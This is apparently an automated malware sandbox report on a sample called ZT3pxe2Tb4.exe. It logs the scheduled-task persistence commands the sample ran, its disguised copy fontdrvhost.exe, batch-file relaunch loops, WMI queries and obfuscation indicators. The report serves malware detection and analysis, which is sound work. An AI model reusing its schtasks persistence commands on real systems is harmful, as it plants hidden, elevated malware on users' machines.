Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ZT3pxe2Tb4.exe ReversingLabs: Detection: 86%
Source: ZT3pxe2Tb4.exe Virustotal: Detection: 73%
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File read: C:\Users\user\Desktop\ZT3pxe2Tb4.exe
Source: unknown Process created: C:\Users\user\Desktop\ZT3pxe2Tb4.exe "C:\Users\user\Desktop\ZT3pxe2Tb4.exe"
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown Process created: C:\Users\user\AppData\Local\fontdrvhost.exe C:\Users\user\AppData\Local\fontdrvhost.exe
Source: unknown Process created: C:\Users\user\AppData\Local\fontdrvhost.exe C:\Users\user\AppData\Local\fontdrvhost.exe
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: ZT3pxe2Tb4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ZT3pxe2Tb4.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: ZT3pxe2Tb4.exe Static file information: File size 3672576 > 1048576
Source: ZT3pxe2Tb4.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x380200
Source: ZT3pxe2Tb4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnet0l source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdbd source: fontdrvhost.exe, 00000022.00000002.2098127256.000000001C46A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnnecg source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdb source: fontdrvhost.exe, 0000002A.00000002.2225604158.000000001CC92000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Unpacked PE file: 0.2.ZT3pxe2Tb4.exe.1670000.5.unpack
Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.cs .Net Code: Type.GetTypeFromHandle(yhXwkbJpFlaQ2BEhFNf.vV0LqIx2Ymr(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(yhXwkbJpFlaQ2BEhFNf.vV0LqIx2Ymr(16777246)),Type.GetTypeFromHandle(yhXwkbJpFlaQ2BEhFNf.vV0LqIx2Ymr(16777260))})
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD7964 push ebx; retf 0_2_00007FFD9BBD796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB7967 push ebx; retf 8_2_00007FFD9BBB796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BC4000A push ebx; ret 8_2_00007FFD9BC4007A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9C0D7498 push ebx; iretd 8_2_00007FFD9C0D756A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA2E94A push edx; retf 9_2_00007FFD9BA2E94B
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA23FBC push eax; retf 9_2_00007FFD9BA23FBD
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA67963 push ebx; retf 9_2_00007FFD9BA6796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 14_2_00007FFD9BBE792B push ebx; retf 14_2_00007FFD9BBE796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BA0E94A push edx; retf 21_2_00007FFD9BA0E94B
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BA03FBC push eax; retf 21_2_00007FFD9BA03FBD
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BA47963 push ebx; retf 21_2_00007FFD9BA4796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BC4000A push ebx; ret 21_2_00007FFD9BC4007A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C0F7C2B push E8FFFFFFh; retf 21_2_00007FFD9C0F7C31
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C0D7498 push ebx; iretd 21_2_00007FFD9C0D756A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C116131 push cs; ret 21_2_00007FFD9C11617F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C117967 push ebx; retf 21_2_00007FFD9C11796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC7969 push ebx; retf 27_2_00007FFD9BBC796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9C0C7498 push ebx; iretd 34_2_00007FFD9C0C756A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA2E94A push edx; retf 35_2_00007FFD9BA2E94B
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA23FBC push eax; retf 35_2_00007FFD9BA23FBD
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA67963 push ebx; retf 35_2_00007FFD9BA6796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBE7228 push E8FFFFFFh; retf 35_2_00007FFD9BBE7231
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C136131 push cs; ret 35_2_00007FFD9C13617F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C137967 push ebx; retf 35_2_00007FFD9C13796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C117C27 push E8FFFFFFh; retf 35_2_00007FFD9C117C31
Source: ZT3pxe2Tb4.exe, IpUxhliHKcCdFefNH6B.cs High entropy of concatenated method names: 'M5xiNYhW88', 'krFixFhEKk', 'ujQise37PE', 'XDZ2qnWhUT4o3s6uaQ2C', 'VWnjYnWhvl7OjqSw0nsS', 'WhauFJWhPaBKUerrygMK', 'lRV843WhEgQOlQX6KsYA', 'pqch5qWh5vfdVB6uP9D1', 'UeI9ydWhI6YGaVvZwKlL', 'TlMEauWhQIQeJm4RKeGW'
Source: ZT3pxe2Tb4.exe, IvcW8TkzBMKefsOxjFW.cs High entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'dbRDWn7vBB', 'RMmDLp8AWE', 'gY2', 'rV4', '_28E'
Source: ZT3pxe2Tb4.exe, Qf4khHiUCwcf7y7oGvp.cs High entropy of concatenated method names: 'LfwiQi4w82', 'bGbuXRWOb87scqdRgwvW', 'M7xMn5WOZ2wIHmhNERHh', 'YLOQwNWOyoC5bgdi10cw', 'iC4GhFWOo5Imjmf1gAfQ', 'Hk5i5w6cjF', 's5OowCWOgq5ARJs5q9v7', 'omd0m7WOeTB3fX7rCK1i', 'VXhkunWOSxFlmfa9i8gD', 'g0LsGZWO1QLv9bnVly7F'
Source: ZT3pxe2Tb4.exe, kcK8LC2ejuNjeyVIyjO.cs High entropy of concatenated method names: 'LkP2O5YDJm', 'GcKaIOW78SAkkpo08bBu', 'giqHAbW76phoaTebjdZA', 'LnvbrgW7HeRFDDiyZw7X', 'yCX2ZKxSG2', 'Vb7IVgW7iQVXxvkFO8K0', 'bbBOEWW7WIej7vsmaBhY', 'qK50M9W7LRubbsxwEQFV', 'EFG3lhW7jaLD9sv6DOFR', 't7Dc5RW7qkn0bNRyGE5v'
Source: ZT3pxe2Tb4.exe, VtQKgNTAqnrKagf1yIu.cs High entropy of concatenated method names: 'n5Kk3EEQl0', 'kgGkWKIgIh', 'G92kLFjHgj', 'qXikiH2y2w', 'H8ikjCF6oJ', 'RUyIZSWrqEP0JkOP09DZ', 'SS9xK3WriE9ikSr3kUDa', 'bGLW0LWrjv6WVntvNZQD', 'UHEbxsWrMUclxO47159y', 'fD2XcRWr2bRXi2tnTcJi'
Source: ZT3pxe2Tb4.exe, GLngHO6KQsXpnYd4Osh.cs High entropy of concatenated method names: 'xrU6rIosOQ', 'c9x3RIWYNJPDR4tQx2DF', 'nJ1cCIWYH7nZfWJuWeth', 'yKJvH6WY8Scg3DGyi3Be', 't4G8rSWYxr6h1EFrkKC4', 'UU8', 'd65', 'gM7WjsqUjnK', 'XGTWjT6Jbxx', 'UP5WFbRhlso'
Source: ZT3pxe2Tb4.exe, aR00MCKbKrrQcafHklS.cs High entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
Source: ZT3pxe2Tb4.exe, aaCFBpjrGhL277svCex.cs High entropy of concatenated method names: 'tnUjvLxJLs', 'GmDwVRWKYR7RwiS5Aiax', 'krM5CkWK7qgJSs2aCjSk', 'TiR06qWKdcSHaP8aUAGm', 'LmWuQhWK09Gg38k3Vjio', 'uhQjmoprTc', 'XI0jnbV2Kn', 'EEujfUyT9R', 'e1ci4VWKKELbu3WC5yxd', 'HVsiKnWKhZMeSG9qP2bK'
Source: ZT3pxe2Tb4.exe, u5DC3ZK3VWcZhtg5bex.cs High entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
Source: ZT3pxe2Tb4.exe, c2O1aZjIohIVoPInDqr.cs High entropy of concatenated method names: 'XHnjJD3uvL', 'gatjAHEgEu', 'kskjzZqh3W', 'cnQYYmWKPa55kXHoYZTH', 'M68xQ6WKEGTxHHw4Y69S', 'QeOUiHWKnnFRpiLrA0m9', 'yf3MZ2WKfQ9uKh7ZBlDe', 'gFojRApOcJ', 'gdbjwM5gQg', 'UQBj4yjfBe'
Source: ZT3pxe2Tb4.exe, BDINTO6ucFPcvOZhsbK.cs High entropy of concatenated method names: '_816', 'd65', 'IH2Wj2eM4Nw', 'OnZWjFWj7mi', 'fxPWF9fBpBq', 'HyrWj32dYif', 'PgI93hWdUSiDA5m6F7aS', 'VfcacVWdvaRvTwGqV8bL', 'Ix0pM3WdPHroHWZOWtl9', 'hcbkOBWdEUuas0x9xtVc'
Source: ZT3pxe2Tb4.exe, u0BBE28OSXVKWSIQuO6.cs High entropy of concatenated method names: 'kwUxBxhXYD', 'CtropMWXEHZbgDXJ8KT6', 'pSgI55WXfnKRqgCaqruG', 'Ifhtj6WXP1fotuIWWkh0', 'AR0kXCWXU6ceFZSFyPwH', 'fks8aatNG6', 'wyp8lv1SWx', 'QEf871OxrT', 'mOP8d1TF6k', 'biu8Y5l9Fl'
Source: ZT3pxe2Tb4.exe, wwOJUoHXIrB4EWAbwDr.cs High entropy of concatenated method names: '_2SY', 'NnyWFYQN31f', 'O8sHrkWZQU', 'EWCWF02WLlY', 'Qtanr4W0ZCd7af5HwyPB', 'VGpVUrW0yHZEGk5PHpUm', 'D4Gx5ZW0eN0OhRCBCrtm', 'AUuMNwW09fyf0By2WA2O', 'igyx8MW0buNuPrflIHYa', 'tKLX1KW0orb9dZicUpiW'
Source: ZT3pxe2Tb4.exe, LepXF7saQNmyW35F7qZ.cs High entropy of concatenated method names: 'j9l', 'bsNs7fxqdV', 'UpnsdRg4Bu', 'UlUsY19HaI', 'TBRs0C9Owv', 'awbsXPD4HT', 'St1sV2cZRK', 'NebRnXWVZ7W9Up753iqP', 'sS0qGqWVe3KYt3qsHZ9j', 'rLw6GTWV9eobHbHQmJMo'
Source: ZT3pxe2Tb4.exe, jkQg7ipZplPn1UotyQn.cs High entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
Source: ZT3pxe2Tb4.exe, mFKgY6O0mUDEgBvPdTN.cs High entropy of concatenated method names: 'YNCOVaFr8s', 'nGLOrBgANR', 'WinOtQUr1p', 'Y2ZOm2E54n', 'dETOnfn2uA', 'LG6r8FWv9gjbhIMJuJyi', 'lN3sB6WvZLMV8BEeLVqj', 'yWZZhYWvghfdpNHRHRdQ', 'zMXvDwWveyguGAOBuaok', 'Ftj3vuWvyIjDpE4rHuYs'
Source: ZT3pxe2Tb4.exe, LDmdN86zB9ogB03sCmW.cs High entropy of concatenated method names: 'tbsHMNecSx', 'MHOq21WYt1QXMQpsvFE5', 'kAhKUUWYVgB4rIxXZ3K2', 'q2wkxJWYrQa11p7T7JDJ', 'VF6UfoWYmpQkr78GmYFE', 'gwX5g8WYn8kUhBDmxBJ4', 'eq7', 'd65', 'PTIWjSrQrDh', 'VhpWj1i8OCN'
Source: ZT3pxe2Tb4.exe, w1ZvxosTOM7oO8WXijS.cs High entropy of concatenated method names: 'GfHsDr0F6n', 'y6lspaa3wB', 't6Fsu2POKC', 'q4Y5sQWVBH6nSK9ZVqNr', 'LXPsu3WVp9cmFccG0h4K', 'iTFsPEWVuXH1Gcx3DuZ3', 'iElKCKWVGAwGbwRpCyVR', 'RmfIvPWVSL4rZo5t6tRM', 'sKFj2hWV1YrM9x8ATgW6'
Source: ZT3pxe2Tb4.exe, F8pEmTlg0rSROwdxrKr.cs High entropy of concatenated method names: 'krr7kqSRvb', 'zcvlkgW5cK0XQpODnT1c', 'Ee2jcUW54H7BoTqoRuUA', 'qDu0xwW5CfA1Li6f3hsk', 'fUUwiuW5JNdNKCW5OWC9', 'i5X', 'GNwl9M7iJb', 'W93', 'L67', '_2PR'
Source: ZT3pxe2Tb4.exe, ElFAbjRAp8gHomcv42l.cs High entropy of concatenated method names: 'RmTwL0WRGB', 'v87wipyKvK', 'JqKh6JWcKYR2EuEHZCsC', 'H4SYsLWchoFJfIpr3lR7', 'g71f0QWcOQ9SdAFuje4c', 'pFXbgtWca4jDDgEKy5YP', 'coORTFWclHUXXbeOGwGi', 'yR2AfaWc7TNEHIFPScxk', 'g4yw3X8UCJ', 'XRTj37WcZUDqyiwCEBJb'
Source: ZT3pxe2Tb4.exe, mo13yK5CrYctkp3dlB7.cs High entropy of concatenated method names: 'TEeINwo7Ns', 'IjmolGW428keDMoo5csY', 'CGvTVAW4F9jVpOYxs3EA', 'd6SeJnW46I9joy3qeXJp', 'GqcaJsW4H4BaBUjCfDpe', 'CPX', 'h7V', 'G6s', '_2r8', 'N28WM7hLb6L'
